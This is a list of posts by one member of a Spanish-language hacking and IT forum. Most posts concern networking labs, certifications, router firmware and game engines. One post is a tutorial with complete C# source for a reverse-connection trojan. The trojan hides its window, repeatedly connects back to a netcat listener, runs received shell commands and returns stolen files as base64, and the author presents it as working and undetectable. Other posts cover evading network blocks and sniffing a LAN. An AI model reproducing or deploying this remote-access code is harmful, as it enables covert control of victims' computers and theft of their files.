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Temas - Devilboy

#1
Off Topic / Foro de certificaciones
Marzo 05, 2016, 07:20:57 PM
Creo que estaría bien tener un área con manuales, vídeos, libros y hasta dudas sobre todo tipo de certificaciones.

Creo que no existe NADA mejor para nosotros los que nos gusta las IT que tener certificaciones
#2




Ojala les guste

salu2


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#3
C# - VB.NET / Creando un troyano en C#
Noviembre 15, 2015, 10:22:13 PM
En este tuto voy a enseñar como crear el principio de un RAT de conexion inversa.

En mi caso usaré visual studio ultimate 2012 pero obviamente puede utilizar algun otro IDE.

***************Creando el Servidor*************


Crearemos un servidor muy simple que lo que hará será esperar a que el cliente se conecte esto será mediante un ciclo infinito con una pausa del tiempo que nosotros indiquémos
Abrimos vs y creamos un nuevo proyecto de winform, y dos  clases con el nombre que querámos en mi caso el nombre dle proyecto es Server, clase Servidor y Utilidades:



Primero escribiremos la clase servidor

agregamos los NameSpaces que necesitamos, en este caso solo agregarémos 3:

Código: php
using System.IO; //Streams
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos



y nuestra clase quedará de la sig. manera:

Código: php
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO; //Streams
using System.Net; //IPAdress
using System.Net.Sockets; //tcpclient
using System.Threading; //Hilos

namespace Server
{
    public class Servidor
    {
//variables necesarias para conectarnos al cliente de manera inversa, ademas de escuchar los mensajes de este

        private string ip;
        private int port;
        private TcpClient tcpClient;
        private NetworkStream ns;
        private StreamReader sr;
        private StreamWriter sw;
        private StringBuilder sb;     
       

        public Servidor(string ip, int port)
        {
            this.ip = ip;
            this.port = port;
        }

        private enum mensajes
        {
            CD,
            Mensaje
        }


        public void iniciar(int tiempo)
        {
            EjecutarServidor();
            Thread.Sleep(tiempo);           
        }

        private void EjecutarServidor()
        {
            tcpClient = new TcpClient();
            sb = new StringBuilder();

            if (!tcpClient.Connected)
            {
                try
                {
                    tcpClient.Connect(ip, port);
                    ns = tcpClient.GetStream();
                    sr = new StreamReader(ns);
                    sw = new StreamWriter(ns);

                }
                catch (Exception)
                {
                    return;
                }

                for (; ; )
                {
                    try
                    {
                        sb.Append(sr.ReadLine());
                        LeerDatos(sb.ToString());
                        sb.Remove(0, sb.Length);
                    }
                    catch (Exception)
                    {
                        limpiar();
                        break;
                    }

                }
            }//fin del if 
        }//fin del metodo EjecutarServidor

        private void LeerDatos(string datos)
        {
            string[] cadena = datos.Split('$');

            if (String.Compare(cadena[0], mensajes.Mensaje.ToString()) == 0)
            {
                Utilidades.mandarMensaje(cadena[1]);
            }
        }//fin de LeerDatos

        private void limpiar()
        {
            sr.Close();
            sw.Close();
            ns.Close();
        }//fin de limpiar
    }//fin clase servidor
}



Aquí he creado las variables que necesitamos para conectarnos al cliente, esto es la ip y el puerto (esto se hace en el constructor) ademas de un StreamReader que usarémos para escuchar los mensajes que el cliente escriba.

Usé una variable del tipo enum, esto es para validar los mensajes del cliente, esto lo hacemos de la sig forma:

si el cliente escribe por ejemplo  "MandarMensaje" el servidor compara ese mensaje con el enum y si son iguales entonces va a realizar alguna tarea que escribamos en la clase Utilidades.

En el metodo iniciar hemos creado un bucle donde se ejecutará el metodo EjecutarServidor y ademas hará una pausa de x milisegundos.

El sig. metodo es el corazón del servidor, aqui intentarémos conectarnos y escucharémos los mensajes que el cliente nos pase

Los mensajes los validaremos en el metodo LeerDatos donde mandarémos como parametros el mensaje que el cliente escriba

Aquí mediante un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta() validamos si el mensaje es igual a lo que esperámos y si es así entonces ejecutarémos lo que haya en Utilidades
además usamos un split para seprar el mensaje del cliente, mas adelante con un ejemplo mostraré lo que realmente hace

el ultimo metodo es limpiar, aqui cerrarémos los streams.

ahora en la clase Utilidades, vamos a indicarle que sea estatica para no tener que instanciarla cada vez que la querámos utilizar

aqui simplemente se ejecuta un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con el mensaje que el cliente haya escrito.

***************Usando la clase*************

ahora solo nos queda irnos al form y en el evento load de nuestro form y escribimos lo sig:

crearemos dos variables

Código: php
private Servidor servidor;
        private int tiempoRecon;


en el contructor las asignarémos:

Código: php
servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;


y el el evento load ejecutarémos nuestra clase:

Código: php
private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }



el codigo completo es el sig:

Código: php
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Server
{
    public partial class Form1 : Form
    {
        private Servidor servidor;
        private int tiempoRecon;

        public Form1()
        {
            InitializeComponent();
            servidor = new Servidor("127.0.0.1", 9999);
            tiempoRecon = 5000;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            this.Hide();
            for (; ; )
            {
                servidor.iniciar(tiempoRecon);
            }
        }
    }
}


***************Usar Netcat o Cryptcat como cliente*************

Como mandar los mensajes de un cliente.

bueno es muy facil podemos crear otra aplicación pero en este caso usarémos al viejo netcat o cryptcar

lo colocámos en c:\ y abrimos linea de comandos:

Código: php
nc.exe -lvp 9999



ejecutamos nuestro servidor y verémos como estámos conectados

ahora solo escribirémos lo sig:

Mensaje$HolaDesdeElCliente

y verémos como se abre el MessageBox del servidor con el mensaje HolaDesdeElCliente

el mensaje del cliente como dije antes se valida en el metodo LeerDatos(string datos)


donde el parametro datos en este caso va a ser igual a "Mensaje$HolaDesdeElCliente"
y mediante el metodo string.split() vamos a separar en un arreglo todo el mensaje que haya antes del signo "$" y todo lo que haya despues
en este caso quedará asi:

Código: php
string[] cadena = datos.Split('$');


siendo:
cadena[0] //Mensaje
y
cadena[1] //HolaDesdeElCliente

si escribimos cualquier otra cosa verémos que nuestro servidor no hace absolutamente nada.

pero bueno ya con ese estoy seguro que se les ocurrirá muchas cosas

bueno ahora verémos como hacerlo a la inversa (del servidor al cliente)

un ejemplo extremandamente sencillo será mandar un mensaje de Bienvenida una vez que el cliente se conecte

esto lo haremos simplemnete usando el metodo writeline de nuestro StreamWriter

solamente agregruen los sig. despues de que tcpclient se conecte:

Código: php
sw.WriteLine("Hola");
sw.Flush();


con eso mandamos un mensaje mediante writeline y mediante flush borramos todos los búferes

una vez sabiendo esto es facil deducir lo que podemos hacer por ejemplo sería creando otra validacion en nuestro metodo LeerDatos

quedaría de la sig forma en pseudocdigo:

Código: php
si el mensaje del cliente es igual a "dameIP" entonces
ejecutamos el metodo Utilidades.obtenerIP

y ese resultado lo mandamos mendiante writeline


como ven es muy facil crear un troyano simple.

ahora les voy a enseñar como mandar comandos cmd a nuestro servidor


agregamos un valor a la variable enum mensajes en mi caso quedó así:

Código: php
private enum mensajes
        {
            CD,
            Mensaje,
            comando
        }



y validamos el mensaje en el metodo LeerDatos

Código: php
if (String.Compare(cadena[0], mensajes.comando.ToString()) == 0)
            {
                Utilidades.consola(cadena[1]);
            }




agregamos el sig. namespace en nuestra clase utilidades:

Código: php
using System.Diagnostics;


y creamos el sig metodo en la clase Utilidades


Código: php
public static void consola(string comando)
        {
            Process cmd = new Process();
            cmd.StartInfo.FileName = "cmd.exe";
            cmd.StartInfo.RedirectStandardInput =
            true;
            cmd.StartInfo.RedirectStandardOutput =
            true;
            cmd.StartInfo.CreateNoWindow = true;
            cmd.StartInfo.UseShellExecute = false;
            cmd.Start();           

            cmd.StandardInput.WriteLine(comando);
            cmd.StandardInput.Flush();
            cmd.StandardInput.Close();
        }



y listo, ahora ejecutamos el servidor, abrimos netcat y mandamos mensaje de la siguiente forma:
comando$md pruebaaaaaa

donde comando es el mensaje que va a validar en LeerDatos
$ es simbola para separar
y md prueba es el comando (crear carpeta pruebaaaaa)

como ven es extremadamente sencillo

***************Descargar archivos del servidor*************


Seguímos usando la misma clase utilidades solo que agregarémos el metodo "downloadFile":

Código: php
 public static string downloadFile(string ruta)
        {

            FileStream fs = new FileStream(ruta, FileMode.Open);

            BinaryReader lector = new BinaryReader(fs);
            byte[] bytes = new byte[(int)fs.Length];
            string cadena = null;
           
            try
            {
                lector.Read(bytes, 0, bytes.Length);
                cadena = Convert.ToBase64String(bytes);             

            }
            catch (IOException ex)
            {
                cadena = "error";
            }

            return cadena;

        }


aquí lo que hacemos es convertir un archivo a base64

ahora agregamos una comparación a nuestra clase Server en el metodo LeerDatos:

Código: php
 if (String.Compare(cadena[0], mensajes.download.ToString()) == 0)
            {
                sw.WriteLine(Utilidades.downloadFile(cadena[1]));
               
            }


y modificamos nuestra variable enumerada "mensajes":

Código: php
  private enum mensajes
        {
            CD,
            Mensaje,
            comando,
            download
        }


por ultimo nos conectanos a nuestro server mediante netcat: -lvp 9999

y escribimos el mensaje:

Código: php
download$ruta_de_archivo


nos damos cuenta que netcat nos muestra todo el codigo en base64, solo nos queda escribir un programa para descifrar ese codigo.

Creamos un nuevo proyecto y en el form agregamos un textbox y un boton (podemos agregar mas cosas pero para hacerlo sencillo solo agregaré esos dos componentes)
y nos queda de esta forma:



hacemos doble click en el boton para agregar codigo:

Código: php
 string sImagenTemporal = "pruebaaaaa.png"; //Nombre y formato que queramos
            FileStream fs2 = new FileStream(sImagenTemporal, FileMode.Create);
            BinaryWriter bw = new BinaryWriter(fs2);


            byte[] bytes = new byte[(int)fs2.Length];     

            try
            {
                bytes = Convert.FromBase64String(textBox1.Text);
                bw.Write(bytes);
            }
             finally 
            {
               
                fs2.Close();
            }


y con eso "creamos" el archivo que hemos "descargado" del servidor

noten que aqui he hardcodeado la variable "sImagenTemporal " con un ombre de archivo y formato, esto lo he hecho así por motivos de simplicidad ya que en mi caso he descargado una imagen, pero lo que deben hacer es crear un savefiledialog pero eso ya es cosa de uds.

les dejo una idea sobre como quedaría ya con el codigo en base64:

Código: php
download$C:\Users\Devil\Desktop\DD\PC\Devil\1.png
iVBORw0KGgoAAAANSUhEUgAAA5IAAABlCAIAAACwbEt5AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAChZSURBVHhe7Z39j17Hdd/9txhFkEjUUiRF0oqg0pQoWpZM
+YVcsFBBu7KoN1t1ItVUljThAgkp2nFkNXVleEuVcpFCgVXUcSEZSwkQahcKkh8CQQiyUgKhQALECYEI
kNlCQAALUM/MuXPumTMvz9znPrv7PLvfgw8Wc889M3Nm7ty5X17eJT920003AwAAAAAAMOdMI1u//e3v
vPnmm+fPf/OWWw6YUwAAAAAAAGwEg2Xr2bPf+CjY+++//+KLf/z5z58wMQAAAAAAAMyWYbL1ySe//uGH
H3aiVZkJAwAAAAAAYLYMkK1/+If/8Ve/+lUnVGMzkQAAAAAAAMyWXrbee++xl19+5cUX/zj7xWrpPSub
CQYAAAAAAGC29LK1U6AfffRXf7V+5MinxE/UNSuZDq5z/Mxqb2eWzdl5wGf4rdOHrf+mm5bdmZCzD3vq
eBSwSRw+/S03e9XeXXrJ9IpztslTa5dO32mcjO8o2LjL7UY9B5MPAAAAgK0iI1vJ3n///YceeoT9Z89+
Q2vWDz744Pz5b3YHwaSRKneevhRpl+OnHz7cn50XWGmlOoxk06VLvXLaMg4/fEmr6uNPrV7KTSP5rbBz
svvMce2ZDQXZWr7cpZyraNkKAAAAgB2Ila1/9Ef/jQskVb///R98+9vf4UO2X/ziF8vLJyVYTBqpYfTW
vOJEGMlTq/mcCJsb2apyK0rARKRmhOxsyMvWyuWGbAUAAADAcKxspYIoV2NvvPGnt9/+SR0sxs5J1N72............... mas codigo en base64


ahora solo peguen todo lo ques les muestra netcat y peguenlo en el decripter que hicimos, click en el boton y listoooo


ya con esto hemos hecho un RAT funcional y lo mejor de todo FUD

Nota: espero no lo borren, a alguien le puede servir

Devilboy
#4
Redes y antenas / Subnetting Master
Agosto 27, 2015, 01:06:33 PM


Una tool que podemos usar cuando estámos aprendiendo subnetting.

La idea es usar el programa para que nos muestre una IP y podámos comparar los resultados

espero que la disfruten

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#5


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ojala les guste

pd: Antrax, lo subes a la bd???
#6
Tengo instalado vmware workstation y una distro de ubuntu

el problema es que no se ve completo por la resolución, alguien sabe como arreglarlo???

#7
Redes y antenas / Configurar Switches de capa 3 en GNS3
Diciembre 04, 2014, 05:14:29 PM


Tools: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#8
Off Topic / Hay algún CCNA o arriba en el foro
Septiembre 24, 2014, 04:00:03 PM
Bueno pues les comento que estoy estudiando para certificarme y quisiera saber si existe en el foro alguien que ya haya hecho el examen
#9
Redes y antenas / Lab de Cisco Catalyst Switches
Agosto 25, 2014, 05:14:38 PM
Una excelente web donde nos ofrece acceso via telnet a varios switches donde podemos aprender toda la sintaxis del Cisco IOS
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#10
GNS3




se los recomiendo bastante

con este simulador podrán probar la mayoria de los comandos de IOS de un switch catalyst 3550
Ideal para practicar CCNA Routing and Switching

Programa para windows, linux y mac: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cisco IOS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
estoy tratando de hacer portable un programa.

Este programa obviamente se instalar y me pide un serial.

bueno ya lo he hecho portable y funciona muy bien en mi maquina.

el problema es que a la hora de probarlo en otra pc, el programa se ejecuta sin problemas de forma portable pero no "guarda" el serial previamente ingresado

yo imagino que este serial se guarda o se agrega al registro de windows, es por eso que quisiera saber si hay algo para ver los registros agregados al momento de instalar un programa

salu2
#12
Off Topic / Le quiero presumir algo xD
Marzo 25, 2014, 02:33:48 PM
Unreal Engine 4


me muero por probarloooo
#13
Off Topic / Alguno tiene cuenta en megahd.me??
Febrero 03, 2014, 05:25:23 PM
pues eso, alguien tiene???
#14
Off Topic / Pregunta sobre cable HDMI
Enero 30, 2014, 10:43:16 PM
compré un cable HDMI para mi xbox y me di cuenta que dice HDMI con ethernet

alguien sabe para que sirve???
#15


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#16
Off Topic / Les presento mi PC (Mac os en PC intel)
Enero 06, 2014, 01:39:58 AM


Mac os Mountain Lion en una PC AlienWare funcionando al 99% ya que solo me falta solucionar un problema con IMessage
#17
POr favor, necesito que alguien que sepa javascript me ayude con un menu

alguien????????????????????????????????????????
#18
Off Topic / Les presento a mi nuevo bb
Noviembre 14, 2013, 05:14:01 PM



Aún no está terminado, pero ahi va


;D ;D ;D ;D ;D
#19
Creo que ya estoy bloqueado o no se que pasa pero les explico

tengo esta cadena: "cadena1$cadena2$cadena3$cadena4$"

quiero separar cadena1, cadena2, cadena3 y cadena4 cada uno en su propia variable por ejemplo:



string stringTemp = "cadena1$cadena2$cadena3$cadena4$";

stringtemp1 = "cadena1";
stringtemp2 = "cadena2";
stringtemp3 = "cadena3";
stringtemp4 = "cadena4";

gracias
#20
Está bastante buena, se las recomiendo

online:


Descargar hd:
[Rapidgator]

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[Uploaded]

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[Secureupload]

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#21
Redes y antenas / Wap54g con dd-wrt como repetidor
Agosto 21, 2013, 09:37:16 PM
Gracias a mi buen amigo ArcanuS he aprendido bastatnte sobre redes y su configuración y bueno solo les quiero mostrar como hacer varias cosas lindas con algun ap o router viejo que tengámos y bueno no necesariamente tiene que ser viejo.



Segun su Wiki: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


DD-WRT es un firmware no-oficial para Linksys WRT54G/GS/GL y otros routers 802.11g basados en un diseño de referencia similar o igual al Broadcom. Puedes ver la compatibilidad en Dispositivos Soportados. Todos estos routers estan diseñados para utilizar linux en el firmware oficial y su código fuente esta disponible bajo licencia GPL.


El firmware lo desarrolla BrainSlayer y su página web es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Las primeras versiones de DD-WRT se basaron en el firmware "Alchemy" de Sveasoft Inc, que a su vez se basa en el firmware original GPL de Linksys y en otros proyectos. DD-WRT se creó debido a que Sveasoft comenzó a cobrar 20$ por descargar su software.

Nota: DD-WRT es un firmware Beta, por ello contiene errores. No es recomendable instalar firmwares beta en redes grandes como las de empresas,bancos, etc.... Puedes encontrar un Bugtracker en: DD-WRT Bugtracker (registro gratuito necesario).

Entre otras características que el firmware oficial de linksys no incluye, DD-WRT añade el Demonio Kai para el Kai Console Gaming network, WDS Puente de red/repetidor, Autenticación Radius para comunicaciones Wireless más seguras, avanzado control de balanceo de cargas o Calidad de servicio (QOS), y software para que funcionen las tarjetas SD/MMC que se le pueden instalar haciendo algunas modificaciones al dispositivo.


En otras palabras, un firmware dd-wrt sirve para "liberar" nuestro dispositivo

¿y para que nos sirve liberarlo?
le pondré un ejemplo.

Hace tiempo tenia la necesidad de repetir mi señal wifi ya que habia lugares de mi casa donde esta no llegaba asi que me vi en la necesidad de requerir un repetidor.



Tuve la fortuna de que un amigo tuviera un viejo Wap54g y me lo regalara ya que segun el "ya no servia para nada".
Lo que hice fue cambiarle el fw por un dd-wrt y lo configuré como repetidor, asi que ahora cuento con una buena señal por toda mi casa.

Si necesitan mas información sobre esto lo pueden checar desde su pagina oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y checar la base de datos para saber si su dispositivo se puede liberar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno en este caso mostraré como configurar un Wap54g.

No mostraré como instalar el fw ya que la verdad hay demasiada información en la red sobre esto ademas de ser extremadamente facil, solo me enfocaré en la configuración.

El primer paso es conectar el AP a nuestra pc via cable ethernet, una vez instalado el fw este asigna la ip: 192.168.1.1 por lo que debemos cambiar nuestra ip por una ip que esté dentro del mismo rango, en mi caso usaré: 192.168.1.10 y una mascara de subred: 255.255.255.0:



Ahora abrimos nuestro navegador de internet e ingresarémos a la sig dirección: 192.168.1.1 ( ip de nuestro AP)

Nos pedirá que configuremos un user y pass para nuestro AP, lo escribimos y damos Apply:


Nos vamos a la pestaña Seguridad, desabilitamos todas las opciones y desabilitamos el firewall, no nos sirve ya que alguna regla debemos de tener en nuestro router principal:



Click en la pestaña Wireless-Basic Settings, aqui es donde vamos a configurarlo como repetidor, lo vamos a dejar como lo tengo yo:
-Wireless Mode: repeater bridge
-Wireless network mode: Mixed
-Wireless Network Name (SSID): Aquí ponemos exactamente el nombre de nuestra red WiFi

Guardamos y damos click en el boton Add, esto nos creará una interfaz virtual, es decir "otra" red wifi que va a ser la señal repetida.
En otras palabras si nuestra red "x" no llega estando en la sala, entonces crearémos una interfaz virtual llamada "y" que será a la cual nos conectaremos estando en la sala:


Click en Wireless-wireless security
En la primera parte vamos a poner EXACTAMENTE la configuración de nuestra red wifi original y en la parte de abajo la seguridad de nuestra señal "repetida" ("y"):


Click en Setup-Basic Setup, nos debe de quedar de la sig forma:

Aqui vamos a configurar el nombre del router, en mi caso cambié la ip de mi AP para que estuviera dentro de la misma subred de mi modem principal: 192.168.0.6 y configurar el Gateway y Local DNS por la ip de nuestro router principal en mi caso es: 192.168.0.1

todo lo demas lo dejamos como está y aplicamos los cambios:


Click en Setup-Advanced Routing
y cambiamos el Operating Mode de Gateway por Router, aplicamos y ha quedado nuestro repetidor:


Les dejo el Backup del Wap54g por si quieren probarlo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Devilboy

#22
Off Topic / Duda con una pagina
Junio 25, 2013, 05:45:20 PM
Tengo una duda, un user del foro posteo una pagina con videotutoriales de microsoft, me pareció muy buena solo que la perdí y no la encuentro

alguno sabrá cual es???
#23
La verdad no se mucho de redes y mi duda es la sig.

Tengo unrouter wifi y desde ahi conecto todos mis dispositivos.

El problema es que en unos cuartos la señal se degrada.

La pregunta es muy simple, que me recomiendan para ampliar la señal wifi?

Tengo entendido que es muy facil de hacerlo con un repetidor, pero mi poco conocimiento de redes me dice que los repetidores no son buenos ya que tiene muchas colisiones por lo que es mejor hacerlo con un switch wifi.

Es posible hacer con router wifi????

o que me recomiendan

salu2
#24
Dudas y pedidos generales / [SOLUCIONADO] Duda php
Agosto 01, 2012, 03:25:05 PM
existirá alguna forma de detectar el nombre de un archivo con php???

por ejemplo subo a un servidor el archivo  programas.pfd

quisiera ke mendiante php me dijera el nombre de ese archivo
#25
Quisiera saber si hay algun programa para crear diagramas pero usando unicamente funciones.

Asi como hay diagramas de clases, casos de uso, etc. quisera algo para modelar funciones o metodos, no se si me explique

salu2
#26
cual de estas dos es mejor?

AMD Radeon™ HD 7870 2GB GDDR5

ó

1GB GDDR5 NVIDIA® GeForce® GTX 555
#27
MAC OSX / [Fw] Stencyl
Mayo 30, 2012, 02:42:13 PM


Otro de mis favoritos...

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Stencyl isn't your average game creation software; it's a gorgeous, intuitive toolset that accelerates your workflow and then gets out of the way. We take care of the essentials like physics and native APIs so you can focus on what's important—making your game yours.

Publish to the App Store, desktop and the web in record time with Stencyl.

Podemos crear juegos para flash y para iOS, ademas por lo que dice en su web están proximos para poder sacar la version para publicar en Android y html 5.

Una opción realmente recomendada.

Como los demás motores, es gratis pero para publicar en .ipa es necesario comprar la licencia.

En la version gratuita solo se puede publicar para flash y para iOS pero obteniendo una marca de agua.



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#28
MAC OSX / [Fw] Cocos2D
Mayo 30, 2012, 02:34:55 PM

cocos2d for iPhone is a framework for building 2D games, demos, and other graphical/interactive applications. It is based on the cocos2d design: it uses the same concepts, but instead of using python it uses objective-c.

cocos2d for iPhone is:

    Easy to use: it uses a familiar API, and comes with lots of examples
    Fast: it uses the OpenGL ES best practices and optimized data structures
    Flexible: it is easy to extend, easy to integrate with 3rd party libraries
    Free: is open source, compatible both with closed and open source games
    Community supported: cocos2d has an active, big and friendly community (forum, IRC)
    AppStore approved: More than 2500 AppStore games already use it, including many best seller games.

cocos2d for iPhone supports: iPod Touch, iPhone, iPad and OS X
Features:

    Scene management (workflow)
    Transitions between scenes
    Sprites and Sprite Sheets
    Effects: Lens, Ripple, Waves, Liquid, Twirl, etc.
    Actions (behaviors):
        Trasformation Actions: Move, Rotate, Scale, Jump, etc.
        Composable actions: Sequence, Spawn, Repeat, Reverse
        Ease Actions: Exp, Sin, Cubic, etc.
        Misc actions: CallFunc, OrbitCamera
    Basic menus and buttons
    Integrated physics engine (both Box2d and Chipmunk)
    Particle system
    Text rendering support (variable and fixed width fonts)
    Texture Atlas support
    Tile Map support (TMXmaps):
        Orthogonal maps
        Isometric maps
        Hexagonal maps
    Parallax scrolling support
    Sound support
    Streak Motion support
    Render Texture support
    High Score server (Cocos Live)
    Point based API: Supports Retina Display
    Touch/Accelerometer support (iOS).  Keyboard / Mouse support (Mac)
    Portrait and Landscape mode (iOS) / Automatic Fullscreen support (Mac)
    Integrated Pause/Resume
    Fast Textures:Supports PVRTC textures, 8-bit textures, 16-bit textures and 32-bit textures
    Language: objective-c
    OpenGL ES 1.1 based (iOS) / OpenGL 1.5 based (Mac)


En otras palabras es un Framework que nos sirve para programar aplicacion para iOS de forma nativa, usando codigo Objective-C

solo se puede usar si tenemos una Mac aunke en teoria si tenemos una makina virtual con mac podrémos usarlo sin problema

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#29
MAC OSX / [Fw] Unreal Development Kit
Mayo 30, 2012, 02:30:13 PM

Unreal Engine es un motor de juego de PC y consolas creados por la compañía Epic Games. Implementado inicialmente en el shooter en primera persona Unreal en 1998, siendo la base de juegos como Unreal Tournament, Deus Ex, Turok, Tom Clancy's Rainbow Six: Vegas, America's Army, Red Steel, Gears of War, BioShock, BioShock 2, Star Wars Republic Commando, Batman: Arkham Asylum o Mass Effect. También se ha utilizado en otros géneros como el rol y juegos de perspectiva en tercera persona. Está escrito en C++, siendo compatible con varias plataformas como PC (Microsoft Windows, GNU/Linux), Apple Macintosh (Mac OS, Mac OS X) y la mayoría de consolas (Dreamcast, Gamecube, Wii, Xbox, Xbox 360, PlayStation 2, PlayStation 3). Unreal Engine también ofrece varias herramientas adicionales de gran ayuda para diseñadores y artistas.

La última versión de este motor es el Unreal Engine 3, está diseñado para la tecnología:

    DirectX 9 (para las plataformas Windows XP/Vista/7 de 32/64-bit y Xbox 360)
    DirectX 10 (para plataformas Windows Vista/7 32/64-bit)
    OpenGL (para plataformas Linux, Mac OS X de 32/64-bit y PlayStation 3).

Tambien gratuito para aprender ademas de poder publicar nuestros juegos de forma gratuita, la unica condición es que para venderlos hace falta comprar la licencia.

Es mi favorito

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#30
MAC OSX / [Fw] GameSalad
Mayo 30, 2012, 02:25:20 PM

Es un Motor para crear juegos de video para iOS y android sin o con muy poca programación.

Como la mayoria de estos motores son gratis para aprender pero si queremos exportar nuestros juegos habrá que pagar una licencia.

Actualmente solo funciona para Mac y para versión windows está en fase Beta.

Lo podrémos descargar desde su pagina oficial

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#31
Tengo una lap conectada a un router y quiero sniffear la misma red pero de las pc conectadas vía alambrica.
He probado wireshark pero no tuve buen resultado, alguno sabrá otra forma??
#32
Cuantas veces nos encontrámos dentro de una red donde tenga bloqueado youtube, facebook, twitter, etc.

Bueno aqúi les traigo unos metodos para poder saltarnos estas restricciones.

-------[[PROXYS]]-----

Muchos de nosotros sabemos que son y para que sirven pero veamos los que nos dice la Wiki:

Un proxy, en una red informática, es un programa o dispositivo que realiza una acción en representación de otro, esto es, si una hipotética máquina A solicita un recurso a una C, lo hará mediante una petición a B; C entonces no sabrá que la petición procedió originalmente de A. Su finalidad más habitual es la de servidor proxy, que sirve para interceptar las conexiones de red que un cliente hace a un servidor de destino, por varios motivos posibles como seguridad, rendimiento, anonimato, etc.

Teniendo mas claro en concepto dejaré algunas paginas que ofrecen este servicio:

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No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  -------> Este es mi preferido ya que funciona sobre ssl

Existen muuuuchas mas pero solo pondré esas pocas ademas el uso de estas paginas no es totalmente de mi agrado ya que son bastante lentas.

-------[[ULTRASURF]]-----

Muchos dirán, ¿pero si ese es tambien un proxy, xq lo pones separado?

Bueno la respuesta es sí, si es un proxy pero yo creo que se ha ganado su propio espacio ya que me parece estupendo.
Se preguntarán como se usa, bueno es muy simple.
Lo unico que tenemos que hacer es bajarlo de la pagina oficial y sin necesidad de instalarlo solo damos doble click y este programa buscará el proxy mas cercano y nos conectarémos a este.

Si necesitan mas info aqui les dejo la pagina oficial donde podrán ver de que se trata ademas de descargarlo.

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-------[[VPN]]-----

Segun la wiki:

Una red privada virtual, RPV, o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión de la red local sobre una red pública o no controlada.

Ejemplos comunes son la posibilidad de conectar dos o más sucursales de una empresa utilizando como vínculo Internet, permitir a los miembros del equipo de soporte técnico la conexión desde su casa al centro de cómputo, o que un usuario pueda acceder a su equipo doméstico desde un sitio remoto, como por ejemplo un hotel. Todo ello utilizando la infraestructura de Internet.

En pocas palabras, es como si nos conectaramos a otra red dentro de nuestra misma red.

les pondré un ejemplo para que quede mas claro.

Nos encontramos conectados a las red A, pero la red A cuenta con filtros para bloquearnos youtube, fb, etc.
Entonces nos conectamos a la red B que es una red "limpia" sin bloqueos, asi que desde nuestra red A conectada a la red B tenemos acceso libre a cualquier pagina.

Como no todo puede ser maravilloso nos encontrámos con unos problemitas y estos son que las vpn no son gratuitas.
Existen algunas ke lo son, pero tienen la condición de que duran muy poco o solo la podemos usar por cierta cantidad de Mb.

Les dejaré la lista de algunas VPN´s gratuitas:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   vpn gratuita que solo se instala y te deja usar 100mb por mes, al termino del mes te da de nuevo los 100mb.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta   me parece que tambien te da 100mb por cada cuenta que creemos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta otra vpn gratis, me parece que está no tiene reestricciones pero no me gustó xq me sacaba a cada rato.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Mi preferida, excelente velocidad de bajada y gratis, lo unico que cada 8 horas cambia de password
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta gratis aunque un poco lenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta lo mismo que la anterior
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  -------> Mi segunda preferida ya que sin instalar nada tendrémos una vpn gratis y rapida.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    esta es la pagina que enseña como configurarla.
el unico pero que tiene es que la contraseña cambia cada 30 minutos, pero es tan facil como volver a conectarnos, cambia el pass y listo.


-------[[TUNEL SSH]]-----

Guardé lo mejor para el final.

Segun la wiki:

Túnel SSH

El protocolo SSH (secure shell) se utiliza con frecuencia para tunelizar tráfico confidencial sobre Internet de una manera segura. Por ejemplo, un servidor de ficheros puede compartir archivos usando el protocolo SMB (Server Message Block), cuyos datos no viajan cifrados. Esto permitiría que una tercera parte, que tuviera acceso a la conexión (algo posible si las comunicaciones se realizan en Internet) pudiera examinar a conciencia el contenido de cada fichero trasmitido.

Para poder montar el sistema de archivo de forma segura, se establece una conexión mediante un túnel SSH que encamina todo el tráfico SMB al servidor de archivos dentro de una conexión cifrada SSH. Aunque el protocolo SMB sigue siendo inseguro, al viajar dentro de una conexión cifrada se impide el acceso al mismo.

Por ejemplo, para conectar con un servidor web de forma segura, utilizando SSH, haríamos que el cliente web, en vez de conectarse al servidor directamente, se conecte a un cliente SSH. El cliente SSH se conectaría con el servidor tunelizado, el cual a su vez se conectaría con el servidor web final. Lo atractivo de este sistema es que hemos añadido una capa de cifrado sin necesidad de alterar ni el cliente ni el servidor web.

Pondré un ejemplo para entender mejor como funciona esto:

Existen paginas donde ofrecen el uso de una consola con GNU/Linux.
Se preguntarán para que, bueno simplemente para que las personas aprendámos el uso de este.

La verdad es que me parece espectacular este servicio, xq creanme que se aprende mucho, ya que tenemos el poder de una consola con GNU/Linux desde cualquier computadora o dispositivo movil.

Lo primero que tenemos que hacer es conseguir una cuenta y mediante el uso de putty (cliente ssh) creamos el tunel y una vez configurado nuestro navegador tendrémos libre acceso en internet.

Existen muchas paginas web que ofrecen este servicio mediante una cuota mensual, otros anual pero tambien existen los gratuitos.

Pondré la lista de estos

